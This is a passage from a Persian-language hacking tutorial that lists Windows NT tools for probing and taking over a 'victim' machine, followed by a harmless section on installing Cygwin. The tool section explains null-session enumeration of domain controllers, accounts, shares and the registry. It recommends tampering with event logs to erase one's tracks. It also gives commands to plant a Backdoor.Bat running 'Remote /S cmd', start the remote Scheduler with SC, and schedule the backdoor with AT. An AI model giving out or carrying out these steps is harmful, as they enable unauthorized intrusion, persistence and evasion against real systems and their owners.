-٧اﺑﺰار : Fport ایﻦ اﺏﺰار ﻗﺎدر اﺱﺖ راﺏﻄﻪ ﻣﻮﺟﺪ ﻣﻴﺎن ﭘﻮرت هﺎی TCPو UDPﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ را ﺏﺎ ﺏﺮﻧﺎﻣﻪ هﺎی در ﺡﺎل اﺟﺮا ﺏﺮ روی ایﻦ ﻣﺎﺷﻴﻦ ﺁﺷﮑﺎر ﮐﻨﺪ. ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ﮐﻪ اﮔﺮ ﺏﻪ ﺧﻂ ﻓﺮﻣﺎن ﻗﺮﺏﺎﻧﯽ دﺱﺘﺮﺱﯽ داریﺪ از ایﻦ ﺏﺮﻧﺎﻣﻪ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﺕﺎ ﻣﻮﻗﻌﻴﺖ اﻧﻮاع ﻣﺨﺘﻠﻔﯽ از ﺏﺮﻧﺎﻣﻪ هﺎیﯽ ﮐﻪ اﻣﮑﺎن ورود ﺏﻪ ﺱﻴﺴﺘﻢ را ﺏﻪ ﺷﻤﺎ ﻣﻴﺪهﺪ را ﺏﺮای ﺷﻤﺎ ﺁﺷﮑﺎر ﮐﻨﺪ. -٨اﺏﺰار : Loggedon ایﻦ اﺏﺰار ﺏﺮای ایﻦ اﺱﺖ ﮐﻪ ﺏﺒﻴﻨﻴﻢ ﭼﻪ ﮐﺴﺎﻧﯽ و اﻟﺒﺘﻪ از ﭼﻪ راﻩ هﺎیﯽ ﺏﻪ ﻣﺎﺷﻴﻦ هﺪف دﺱﺘﺮﺱﯽ دارﻧﺪ .ایﻦ هﻢ ذﮐﺮ ﮐﻨﻢ ﮐﻪ ﺱﻮیﭻ و ..ﻧﺪارد و یﮏ ﻓﺮﻣﺎن ﺕﻨﻬﺎ اﺱﺖ و اﻟﺒﺘﻪ ایﻦ اﺏﺰار ﮐﺎر ﺏﺮاﻧﯽ و اﻟﺒﺘﻪ روﺷﻬﺎی اﺕﺼﺎل ﻗﺎﻧﻮﻧﯽ را ﻓﻘﻂ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ و اﻣﺜﺎل ﺧﻮدﻣﺎن را ﻧﻤﺎیﺶ ﻧﻤﻴﺪهﺪ !! -٩اﺏﺰار : NT Last ایﻦ اﺏﺰار دﻗﻴﻘﺎ ﮐﺎرای ﺏﺎﻻ را دارد ﺏﺎ ایﻦ ﺕﻔﺎوت ﮐﻪ ﮐﺎر ﺏﺮاﻧﯽ و روﺷﻬﺎی اﺕﺼﺎل ﮐﻪ ﻗﺒﻞ ﺏﻪ ﻣﺎﺷﻴﻦ هﺪف ﻣﺘﺼﻞ ﺏﻮدن و اﻻن ﻣﺘﺼﻞ ﻧﻴﺴﺘﻨﺪ را ﻧﺸﺎن ﻣﻴﺪهﺪ!! ﺿﻤﻴﻤﻪ ﭼﻬﺎرم ؛ ﻣﻌﺮﻓﯽ اﺑﺰار هﺎی : NT Resource Kit ایﻦ هﻤﻴﻦ ﺟﺎ اول ﮐﺎر ﺏﮕﻮیﻢ ﮐﻪ ایﻦ ﺏﺴﺘﻪ اﺏﺰارهﺎی زیﺎدی دارد و ﻣﻦ ﻓﻘﻂ ﺁﻧﻬﺎیﯽ را ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ﮐﻪ ﺏﻪ درد ﮐﺎر ﻣﺎ ﺏﺨﻮرد ﺏﺮای ﺕﻬﻴﻪ ایﻦ ﺏﺴﺘﻪ ﺏﺪ ﻧﻴﺴﺖ یﮏ ﺱﺮی ﺏﻪ ﺱﺎیﺖ ﻣﺎیﮑﺮوﺱﺎﻓﺖ ﺏﺰﻧﻴﺪ ﮐﻞ ﺟﻌﺒﻪ ﺁن را ﭘﻴﺪا ﻣﻴﮑﻨﻴﺪ !!! دوﺏﺎرﻩ ﺕﺎﮐﻴﺪ ﻣﻴﮑﻨﻢ ﻗﺴﻂ ﻣﻦ ﻓﻘﻂ ﻣﻌﺮﻓﯽ اﺱﺖ ﻧﻪ ﺁﻣﻮزش ﮐﺎﻣﻞ ﺏﻘﻴﻪ ﮐﺎر را ﺏﺎیﺪ ﺧﻮدﺕﺎن ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻧﻴﺎزﺕﺎن اﻧﺠﺎم دهﻴﺪ !! -١اﺑﺰار DUMPELو ﻳﺎ ﺑﺎ ﻧﺎم ﮐﺎﻣﻞ : Dump Event Log ایﻦ اﺏﺰار ﺏﺮای ﻣﺸﺎهﺪﻩ اﺕﻔﺎق هﺎی اﻣﻨﻴﺘﯽ اﺱﺖ ﮐﻪ اﻓﺘﺎدﻩ و ﺙﺒﺖ ﺷﺪﻩ و ﮐﺎرای ﺧﻮﺏﯽ ﻧﻴﺰ دارد اﻟﺒﺘﻪ ﺏﺎ ویﺮایﺶ ایﻦ اﺏﺰار هﻴﭻ وﻗﺖ زﻣﺎن ویﺮایﺶ ﻓﺎیﻞ ﺙﺒﺖ وﻗﺎیﻊ ﻋﻮض ﻧﻤﻴﺸﻮد در ﮐﻞ ﺧﻮب اﺱﺖ ﺏﺮای ﭘﺎک ﮐﺮدن رد ﭘﺎهﺎی ﺧﻮدﻣﺎن !! -٢اﺑﺰار : NLTEST هﻨﮕﺎم ﺕﻌﻴﻴﻦ داﻣﻨﻪ در ﺷﺒﮑﻪ ﻣﻴﺘﻮان ﮐﻨﺘﺮل هﺎی داﻣﻨﻪ را ﻣﺴﺘﻘﺮ ﮐﺮد !! ایﻦ اﺏﺰار ﺏﺮای ﺟﺎیﮕﺰیﻨﯽ ایﻦ ﮐﻨﺘﺮل ﮐﻨﻨﺪﻩ هﺎ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﻣﻴﮕﻴﺮد!! ﺷﻤﺎ ﺏﺮای اﺱﺘﻔﺎدﻩ از ایﻦ اﺏﺰار ﻧﻴﺎز ﺏﻪ ﭘﻮرت ١٣٩ﺏﺎز داریﺪ و اﻟﺒﺘﻪ هﻴﭻ ﻧﻴﺎزی ﺏﻪ داﻧﺴﺘﻦ ﮐﻠﻤﻪ ﻋﺒﻮر و ﻧﺎم ﺡﺴﺎب ﮐﺎرﺏﺮی ﻧﺪاریﺪ !!! -٣اﺑﺰار : EDUMP ایﻦ اﺏﺰار ﺏﺮای ﺏﺪﺱﺖ ﺁوردن اﻃﻼﻋﺎت اﺽﺎﻓﯽ از ﺱﻴﺴﺘﻢ هﺪف اﺱﺖ از ﺟﻤﻠﻪ ﺧﺪﻣﺎت اﻧﺘﻘﺎل هﺎ !!و ﻧﺸﺎﻧﯽ هﺎی IPﺱﻴﺴﺘﻢ هﺎی هﺪف و... : USRSTAT -۴
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٦٢
ﺏﺮﻧﺎﻣﻪ ای اﺱﺖ ﮐﻪ اﻣﮑﺎن ﮔﺮد ﺁوری ﻣﻄﺎﻟﺐ ﮐﺎرﺏﺮ را از ﮐﻨﺘﺮل ﮐﻨﻨﺪﻩ داﻣﻨﻪ هﺪف ﻓﺮاهﻢ ﻣﻴﺴﺎزد .ﺏﺮای ﮐﺸﻒ ﮐﻨﺘﺮل ﮐﻨﻨﺪﻩ ﻣﻴﺘﻮاﻧﻴﺪ از NLTESTو یﺎ هﺮ اﺏﺰار ﻣﻮرد ﻋﻼﻗﻪ دیﮕﺮ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ .ایﻦ اﺏﺰار ﻧﻴﺎز ﺏﻪ یﮏ اﺕﺼﺎل NULLﻧﻴﺰ دارد. -۵اﺑﺰار : Local Administrators ایﻦ اﺏﺰار ﺏﺮای ﺕﺸﺨﻴﺺ ﺡﺴﺎب هﺎی ﮐﺎرﺏﺮی ﺏﺎ ﻣﺠﻮز ﻣﺪیﺮ اﺱﺖ اﻟﺒﺘﻪ ﻓﻘﻂ ﻣﺤﻠﯽ ﻧﻴﺴﺖ و از راﻩ دور هﻢ ﮐﺎر ﻣﻴﮑﻨﺪ !! -۶اﺑﺰار : Global ایﻦ اﺏﺰار دﻗﻴﻘﺎ ﻣﺜﻞ ﻗﺒﻠﯽ اﺱﺖ و ﻓﻘﻂ از ﮐﻨﺘﺮل داﻣﻨﻪ ﺏﺮای ﺕﺸﺨﻴﺺ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ایﻦ دﺱﺘﻮر ﻧﻴﺎز ﺏﻪ یﮏ اﺕﺼﺎل NULLﻧﻴﺰ دارد و اﻟﺒﺘﻪ ﺏﻪ ﭘﻮرت ١٣٩ﺏﺎیﺪ ﺏﺎز ﺏﺎﺷﺪ !! -٧اﺑﺰار : Srvcheck ایﻦ اﺏﺰار ﺏﺮای ﮐﺸﻒ ﺱﺮویﺲ دهﻨﺪﻩ و اﻃﻼﻋﺎت ﻣﺠﻮز اﺷﺘﺮاک ﺏﻪ ﮐﺎر ﻣﻴﺮود و اﻃﻼﻋﺎت اﺷﺘﺮاک هﺎی ﻣﺨﻔﻴﺎﻧﻪ را ﻧﻴﺰ ﮐﺸﻒ ﻣﻴﮑﻨﺪ .ﻧﻴﺎز ﺏﻪ یﮏ اﺕﺼﺎل NULLدارد ﺕﺎ ﮐﺎر ﺏﮑﻨﺪ. -٨اﺑﺰار : SRVINFO ایﻦ اﺏﺰار ﺏﻪ ﻣﻨﻈﻮر ﺏﺮ ﺷﻤﺮدن اﻃﻼﻋﺎت ﻣﻔﺼﻞ در ﻣﻮرد ﺱﺮویﺲ دهﻨﺪﻩ هﺪف ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﻣﻴﮕﻴﺮد .ایﻦ اﻃﻼﻋﺎت در ﺏﺮ ﮔﻴﺮﻧﺪﻩ ؛ ﺧﺪﻣﺎت ،ﮔﺮداﻧﺪﻩ هﺎ ،ﻧﺴﺨﻪ ﻧﺮم اﻓﺰار و اﺷﺘﺮاک هﺎ ﻣﻴﺒﺎﺷﺪ .ایﻦ اﺏﺰار ﺏﺎز هﻢ ﻣﺜﻞ ﻗﺒﻠﯽ هﺎ ﻧﻴﺎز ﺏﻪ یﮏ اﺕﺼﺎل NULLدارد. -٩اﺑﺰار : AUDITPOL ایﻦ اﺏﺰار ﺟﻬﺖ ﺏﺮﺱﯽ از راﻩ دور و ﺡﺴﺎب هﺎی ﻓﻌﺎل یﺎ ﻏﻴﺮ ﻓﻌﺎل ﺱﻴﺴﺘﻢ NTﺏﻪ ﮐﺎر ﻣﻴﺮود و اﮔﺮ ﻣﻴﺨﻮاهﻴﺪ درﺱﺖ ﮐﺎر ﮐﻨﺪ ﻧﻴﺎز ﺏﻪ دﺱﺘﺮﺱﯽ ﻣﺪیﺮیﺘﯽ ﻧﻴﺰ ﻣﻴﺒﺎﺷﺪ .اﻟﺒﺘﻪ دﺱﺘﻮرات ﻗﺎﺏﻞ اﺟﺮای ﺏﻌﺪی ﺏﺮ روی ﺱﻴﺴﺘﻢ را ﻧﻴﺰ ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ. -١٠اﺑﺰار : SOMARSOFT DUMPREG ایﻦ اﺏﺰار اﻣﮑﺎن دﺱﺘﺮﺱﯽ ﺏﻪ ﻣﻘﺎدیﺮ Registryرا ﺏﺮای ﻣﺎ ﻓﺮاهﻢ ﻣﻴﮑﻨﺪ .ایﻦ اﺏﺰار اﺡﺘﻴﺎج ﺏﻪ یﮏ اﺕﺼﺎل NULLدارد و اﻟﺒﺘﻪ ﺏﺎ یﮏ ID ﻣﻌﺘﺒﺮ. -١١اﺑﺰار : REGDMP ایﻦ اﺏﺰار ﺟﻬﺖ ﻧﺴﺨﻪ ﺏﺮداری اﻃﻼﻋﺎت Registryاز ﺱﺮویﺲ دهﻨﺪﻩ ﺏﻪ ﮐﺎر ﻣﻴﺮود ﻣﻌﻤﻮﻻ ﻧﻴﺎز ﺏﻪ دﺱﺖ رﺱﯽ ﻣﺪیﺮیﺘﯽ دارد و اﻟﺒﺘﻪ ﻧﻴﺎز ﺏﻪ اﺕﺼﺎل . null -١٢اﺑﺰار : Remote ایﻦ اﺏﺰار ﺏﺮای ﮐﺴﺐ دﺱﺘﺮﺱﯽ ﺧﻂ ﻓﺮﻣﺎن هﺪف ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﻣﻴﮕﻴﺮد .ﭘﻴﺶ از ﺏﻪ ﮐﺎر ﮔﻴﺮی ایﻦ اﺏﺰار ﺏﺎیﺪ ﮐﻠﻤﻪ ﻋﺒﻮر و ﻧﺎم ﮐﺎرﺏﺮی ﺏﺎ ﻣﺠﻮز ﻣﺪیﺮ دﺱﺖ یﺎﻓﺖ .هﻤﭽﻨﻴﻦ SC.exeو ) remote.exeاﮔﺮ ﺱﺮویﺲ Schedulerدر هﺪف ﺁﺷﮑﺎر ﻧﺸﺪﻩ ﺏﺎﺷﺪ و ﻓﺎیﻞ ﮔﺮوﻩ ) ( Backdoor.Batرا ﺏﺮای هﺪف ﻧﺴﺨﻪ ﺏﺮداری ﻣﻴﮑﻨﻴﻢ .ایﻦ ﻓﺎیﻞ ﮔﺮوهﯽ ﺡﺎوی دﺱﺘﻮر زیﺮ اﺱﺖ : Remote /S (cmd) pipname Pipeﺧﻮد را ﺏﻪ هﺮ ﻧﺎﻣﯽ ﮐﻪ ﺏﺨﻮاهﻴﺪ ،ﻣﻴﺘﻮاﻧﻴﺪ ﻧﺎم ﮔﺬاری ﮐﻨﻴﺪ .ﺱﭙﺲ ﺏﻪ ﻣﻨﻈﻮر اﺟﺮای ﻓﺎیﻞ ﮔﺮوهﯽ ﺏﺎیﺪ یﮏ روش دﺱﺖ یﺎﺏﻴﻢ ﮐﻪ ﻣﻌﻤﻮﻻ از Schedulerاﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ .هﻨﮕﺎﻣﻴﮑﻪ ﻓﺎیﻞ ﮔﺮوهﯽ اﺟﺮا ﻣﻴﺸﻮد ﻣﻴﺘﻮان ﺏﻮﺱﻴﻠﻪ دﺱﺘﻮر زیﺮ ﺏﺎ ﺱﺮویﺲ دهﻨﺪﻩ ارﺕﺒﺎط ﺏﺮﻗﺮار ﮐﺮد : C:\> Remote /C Servername pipename -١٣اﺑﺰار : SC ایﻦ اﺏﺰار ﺏﻪ ﻣﻨﻈﻮر ﺁﻏﺎز و ﺕﻮﻗﻒ ﺱﺮویﺲ Scheduleدر ﺱﻴﺴﺘﻢ ﻣﺤﻠﯽ ﺏﻪ ﮐﺎر ﻣﻴﺮود !! ﺏﺮای ﺏﻪ ﮐﺎرﮔﻴﺮی ایﻦ اﺏﺰار ﺏﺎیﺪ دﺱﺘﺮﺱﯽ ﻣﺪیﺮیﺘﯽ و NetBIOSﺁﺷﮑﺎری در اﺧﺘﻴﺎر داﺷﺖ Schedule Service .ﺏﻪ ﻣﻨﻈﻮر اﺟﺮای زﻣﺎن ﺏﻨﺪی ﻣﺸﺎﻏﻞ ﺏﻪ ﮐﺎر ﻣﻴﺮود ،هﻤﭽﻮن یﮏ ﻓﺎیﻞ ﮔﺮوهﯽ
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٦٣
ﮐﻪ ﺡﺎوی یﮏ ﭘﺮدازﻩ ﺏﺮای ﮔﺸﻮدن درب ﭘﺸﺘﯽ اﺱﺖ ﮐﻪ ﺕﻮﺱﻂ Remoteیﺎ NCﺻﻮرت ﻣﻴﮕﻴﺮد .ﺏﺮای ﺁﻏﺎز ﺱﺮویﺲ Schedulerدر ﺱﻴﺴﺘﻢ از راﻩ دور ﺏﺎیﺪ از دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﮐﺮد: C :\> SC \\ Server Start Schedule هﻤﭽﻨﻴﻦ ﺏﻪ ﻣﻨﻈﻮر ﺕﺎیﻴﺪ ﺱﺮویﺲ Scheduleﮐﻪ ﺟﺮیﺎن دارد و یﺎ ﭘﺮﺱﺶ Schedulerﺏﺎیﺪ دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﻢ : C :\> SC \\ Server query Schedule هﻨﮕﺎم ﺏﻪ ﮐﺎر ﮔﻴﺮی از ایﻦ دﺱﺘﻮر ﺷﺎیﺪ ﺏﻪ اﺱﺘﻔﺎدﻩ از ATیﺎ Net timeﺟﻬﺖ ایﺠﺎد هﻤﺎهﻨﮕﯽ در Scheduleﻧﻴﺎز ﺏﺎﺷﺪ. -١۴اﺑﺰار : AT ایﻦ اﺏﺰار را ﻣﻴﺘﻮان ﺟﻬﺖ ﺏﺮﻧﺎﻣﻪ ریﺰی از راﻩ دور ﺏﻮﺱﻴﻠﻪ Schedule Serviceاﺱﺘﻔﺎدﻩ ﮐﺮد و هﻨﮕﺎم در دﺱﺘﺮس ﻗﺮار ﻣﻴﮕﻴﺮد ﮐﻪ ﭘﺮدازﻩ ایﯽ را اﺟﺮا ﮐﺮد و دﺱﺘﺮﺱﯽ Remoteرا ﺏﻪ ﺱﻴﺴﺘﻢ ﺕﻘﻮیﺖ ﮐﺮد .اول ﺏﺎیﺪ ﺙﺎﺏﺖ ﮐﺮد ﮐﻪ Schedule Serviceدر ﻣﻴﺰﺏﺎن ﺁﻏﺎز ﺷﺪﻩ اﺱﺖ و یﺎ ﺱﺮویﺲ را ﺏﺎ دﺱﺘﻮر SCﺏﺎﻻ ﺏﻪ ﮐﺎر ﮔﺮﻓﺖ .ﺱﭙﺲ زﻣﺎن ﻣﺤﻠﯽ را ﮐﺸﻒ ﮐﺮد ﺏﻌﺪ از دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﮐﺮد: ”C :\> at \\ Server time “Command ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﻪ ﺟﺎی Commandﻣﺴﻴﺮ ﭘﺮدازﻩ ﺧﻮد را ﺏﻨﻮیﺴﻴﺪ .ﮐﻪ در اﺏﺰار ﻗﺒﻠﯽ ﺕﻮﺽﻴﺢ دادم ﻣﺜﻼ ﻓﺎیﻞ Backdoor.Batﮐﻪ ﺡﺎوی ﭘﺮدازﻩ ای ﺟﻬﺖ ﭘﺮداﺧﺘﻦ ﺏﻪ Remoteیﺎ NCﻣﻴﺒﺎﺷﺪ ﺕﺎ درب ﭘﺸﺘﯽ را در ﻣﺎﺷﻴﻦ هﺪف ایﺠﺎد ﮐﺮد .ﺟﻬﺖ ﭘﺮﺱﺶ از ایﻦ ﮐﻪ ﭼﻪ ﻣﺸﺎﻏﻠﯽ ایﺠﺎد ﺷﺪﻩ اﻧﺪ از دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد : C :\> at \\ Server -١۵اﺑﺰار : KILL ایﻦ اﺏﺰار ﺏﺮای ﻧﺎﺏﻮد ﮐﺮدن یﮏ ﻓﺮایﻨﺪ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﻣﻴﮕﻴﺮد .ﺷﮑﻞ دﺱﺘﻮر ایﻦ ﺟﻮری اﺱﺖ: >D :\> kill
ﺿﻤﻴﻤﻪ ﭘﻨﺠﻢ ؛ ﺣﻞ ﻣﺸﮑﻞ اﺟﺮای ﺑﺮﻧﺎﻣﻪ هﺎی ﺕﺤﺖ ﻟﻴﻨﻮﮐﺲ در وﻳﻨﺪوز !! ﺕﻮﺻﻴﻪ ﻣﻮﮐﺪ ﻣﻦ ﺏﻪ ﺷﻤﺎ اﺱﺘﻔﺎدﻩ از Cygwinﺏﺎ ﺕﻤﺎم Packageهﺎی ﺁن اﺱﺖ. ﺧﻮب ﺏﺮای ایﻦ ﮐﺎر راﻩ ﺡﻞ هﺎی ﺏﺴﻴﺎری وﺟﺪ دارد ﮐﻪ اﻟﺒﺘﻪ اﮐﺜﺮ دوﺱﺘﺎن ﻧﻴﺰ ﺏﺎ ﺁن ﻧﺎ ﺁﺷﻨﺎ هﺴﺘﻨﺪ .ﮐﻼ ﺏﺮای اﻧﺠﺎم ایﻦ ﮐﺎر از دو راﻩ ﮐﻠﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد ؛ راﻩ اول ﻧﺼﺐ یﮏ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻣﺠﺎزی درون ویﻨﺪوز ؛ راﻩ دوم ﺷﺒﻴﻪ ﺱﺎزی یﮏ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻣﺠﺎزی درون ویﻨﺪوز. راﻩ ﺡﻞ دوم ﺏﺎزدهﯽ ﺏﻴﺸﺘﺮ و اﻟﺒﺘﻪ ﮐﺎرای ﺏﻴﺸﺘﺮ وﻟﯽ دﻧﮓ ﻓﻨﮓ زیﺎد ) ﻓﻘﻂ در ﻣﻮﻗﻊ ﻧﺼﺐ ( را دارا اﺱﺖ ﻣﻦ از ایﻦ ﻧﻤﻮﻧﻪ ﻓﻘﻂ ﺏﻪ ﺕﻮﺽﻴﺢ ﺏﺮﻧﺎﻣﻪ Cygwinﺏﺴﻨﺪﻩ ﻣﻴﮑﻨﻢ .راﻩ ﺡﻞ اول ﺷﻤﺎ واﻗﻌًﺎ ﺏﺎیﺪ یﮏ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻣﺠﺎزی را درون ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ اﺻﻠﯽ ﺧﻮد ﻧﺼﺐ ﮐﻨﻴﺪ ﮐﻪ ﺏﺮای ایﻦ ﮐﺎر ﺏﺮﻧﺎﻣﻪ هﺎی ﻣﺘﻌﺪدی ) ﺏﻴﺶ از ۵ﺏﺮﻧﺎﻣﻪ( وﺟﺪ دارد ﮐﻪ از ایﻦ دﺱﺖ ﻣﻦ دو ﺏﺮﻧﺎﻣﻪ ﻣﻌﺮوف VM WAREو Microsoft virtual pcو Connectix Virtual pcرا ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ) .دو ﺏﺮﻧﺎﻣﻪ ﺁﺧﺮی یﮏ ﺏﺮﻧﺎﻣﻪ ﺏﺎ دو ﻧﺎم ﻣﺘﻔﺎوت اﺱﺖ(. اول ﺏﺮﻧﺎﻣﻪ Cygwinرا ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ) ﮐﻪ ﻋﺎﺷﻖ ﺁن ﺷﺪم و زﻧﺪﮔﯽ ﺏﺪون ﺁن ﺏﺮایﻢ اﻣﮑﺎن ﭘﺬیﺮ ﻧﻴﺴﺖ اﺻﻼ ( ﭼﻮن ﻓﻮق اﻟﻌﺎدﻩ ﺧﻔﻦ اﺱﺖ و اﻟﺒﺘﻪ رایﮕﺎن هﻢ اﺱﺖ و ﮐﺪ هﺎی ﺏﺮﻧﺎﻣﻪ ﺁن هﻢ در دﺱﺖ رس ﻣﻴﺒﺎﺷﺪ. ﺑﺮﻧﺎﻣﻪ ﻣﺎﻓﻮق ﺧﻔﻦ : Cygwin ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﻴﺘﻮاﻧﻢ ﺏﮕﻮیﻢ ﺱﺎل ١٩٩٧ﻣﻴﻼدی و ﮐﻤﯽ ﻗﺒﻞ ﺕﺮ ﻧﻮﺷﺘﻪ ﺷﺪﻩ و ﮐﻢ ﮐﻢ ﺕﻮﺱﻌﻪ یﺎﻓﺘﻪ اﺱﺖ ﺱﻴﺴﺘﻢ ﮐﺎری ﺁن ﺧﻴﻠﯽ ﺱﺎدﻩ اﺱﺖ و ﻓﻘﻂ از یﮏ ﻣﮑﺎﻧﻴﺰم ﻣﻨﻔﺮد Dynamic Linked Libraryیﺎ ﺏﻪ اﺧﺘﺼﺎر DLLاﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ .ﺁدم ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺏﺮﻧﺎﻣﻪ رویﺎیﯽ اﺱﺘﻔﺎدﻩ از اﺏﺰارهﺎی ﺕﻮﭘﯽ هﻤﭽﻮن Nessusو md5sumو straceو stringsو Cheopsو ...ﮐﻪ ﻓﻘﻂ ﺏﺮای ﻟﻴﻨﻮﮐﺲ ﻧﻮﺷﺘﻪ اﻧﺪ را ﺏﺪون هﻴﭽﮕﻮﻧﻪ ﻣﺸﮑﻠﯽ ﺕﺤﻘﻖ ﻣﯽ یﺎﺏﺪ ) .ﺕﺄﮐﻴﺪ ﻣﻴﮑﻨﻢ ﺏﺪون ﻣﺸﮑﻞ و اﻟﺒﺘﻪ ﺏﺪون دﻧﮓ ﻓﻨﮓ ( ایﻦ اﺏﺰار ﻣﺸﮑﻞ ﺕﺮیﻦ ﻣﺮﺡﻠﻪ ﺁن ﻣﺮﺡﻠﻪ ﻧﺼﺐ ﺏﺮﻧﺎﻣﻪ اﺱﺖ و اﻟﺒﺘﻪ ﺕﻬﻴﻪ یﮏ ﻧﺴﺨﻪ ﮐﺎﻣﻞ از ﺁن دردﺱﺮ ﺧﻴﻠﯽ زیﺎد اﺱﺖ .اﮔﺮ ﻗﺴﻂ ﺁن را داریﺪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ را ﺏﻪ روال ﻣﻌﻤﻮل ﺧﻮدش ﻧﺼﺐ ﮐﻨﻴﺪ ﺡﺘﻤﺎ ﺏﻪ ﻓﮑﺮ ﺕﻬﻴﻪ یﮏ ﺧﻂ DSLﺏﯽ اﻓﺘﺪ !!
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٦٤
ﺕﻮﺻﻴﻪ ﻣﻦ ﭘﻴﺪا ﮐﺮدن یﮏ ﻧﺴﺨﻪ ﮐﺎﻣﻞ از ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻌﻼوﻩ ﺕﻤﺎم اﻣﮑﺎﻧﺎت ﺟﺎﻧﺒﯽ ﺁن اﺱﺖ یﺎ ﺡﺪاﻗﻞ اﻣﮑﺎﻧﺎت اﺱﺎﺱﯽ ﺁن ﮐﻪ ﺡﺪاﻗﻞ ١١٣ﻣﮕﺎﺏﺎیﺘﯽ ﺏﺎیﺪ ﺡﺠﻢ داﺷﺘﻪ ﺏﺎﺷﺪ .ﮐﻪ ﺏﺮای ایﻦ ﻣﻨﻈﻮر ﻣﻴﺘﻮاﻧﻴﺪ از ﺱﺎیﺖ داﻧﺸﮕﺎﻩ " ﺏﺮﮐﻠﯽ " Berkeleyاﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﻧﺴﺨﻪ ﮐﻪ ﻣﻦ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ﺁدرس ﺁن را در زیﺮ ﻗﺮار دادﻩ ام اﻟﺒﺘﻪ واﻗﻌًﺎ ﻣﺤﺸﺮ اﺱﺖ. http://ptolemy.eecs.berkeley.edu/ptolemyII/ptII4.0/cygwinDevelSrc.exe اﻟﺒﺘﻪ ﻧﺴﺨﻪ هﺎی دیﮕﺮی هﻢ وﺟﺪ دارد ﮐﻪ ﺡﺠﻢ ﮐﻤﺘﺮی دارد از ﻗﺒﻴﻞ : http://ptolemy.eecs.berkeley.edu/ptolemyII/ptII4.0/cygwinBasic.exe ﺏﺎ ﺡﺠﻢ ١٠٫٩ﻣﮕﺎﺏﺎیﺖ و ﻧﺴﺨﻪ http://ptolemy.eecs.berkeley.edu/ptolemyII/ptII4.0/cygwinDevel.exe ﺏﺎ ﺡﺠﻢ ﺕﻘﺮیﺒﯽ ٣۴٫۶ﻣﮕﺎﺏﺎیﺖ و ﻧﺴﺨﻪ http://ptolemy.eecs.berkeley.edu/ptolemyII/ptII4.0/cygwinBasic.exe ﺏﺎ ﺡﺠﻢ ١١٫١ﻣﮕﺎﺏﺎیﺖ و ﻧﺴﺨﻪ http://ptolemy.eecs.berkeley.edu/ptolemyII/ptII4.0/cygwinDevel.exe ﺏﺎ ﺡﺠﻢ ﺕﻘﺮیﺒﯽ ٢۵٫۴ﻣﮕﺎﺏﺎیﺖ . ﺏﻌﺪ از دریﺎﻓﺖ هﺮ ﮐﺪام از ایﻦ هﺎ ،ﻣﺮاﺡﻞ زیﺮ را ﺏﻪ ﺕﺮﺕﻴﺐ اﻧﺠﺎم دهﻴﺪ -١ﺁن را از ﺡﺎﻟﺖ ﻓﺸﺮدﻩ ﺧﺎرج ﮐﺮدﻩ و ﺏﺮﻧﺎﻣﻪ ﻧﺼﺐ را از داﺧﻞ ﭘﻮﺷﻪ اﺟﺮا ﮐﻨﻴﺪ ) ﻣﻌﻤﻮﻻ ﺧﻮدش ﺧﻮدﮐﺎر ﺏﺎﻻ ﻣﯽ ﺁیﺪ ( -٢ﺏﻌﺪ ﮔﺰیﻨﻪ Install from local directoryرا اﻧﺘﺨﺎب ﮐﺮدﻩ )ﻣﻌﻤﻮﻻ ﺧﻮدش ایﻦ را هﻢ اﻧﺘﺨﺎب ﻣﻴﮑﻨﺪ ﺏﻪ ﺻﻮرت ﭘﻴﺶ ﻓﺮض ( -٣ﺏﻌﺪ Root Directoryرا ﺟﺎیﯽ اﻧﺘﺨﺎب ﮐﻨﻴﺪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ در ﺁﻧﺠﺎ ﻗﺮار ﻣﻴﮕﻴﺮد و ) ریﺸﻪ ﺷﺮوع ﻟﺒﻪ ﮐﺎر 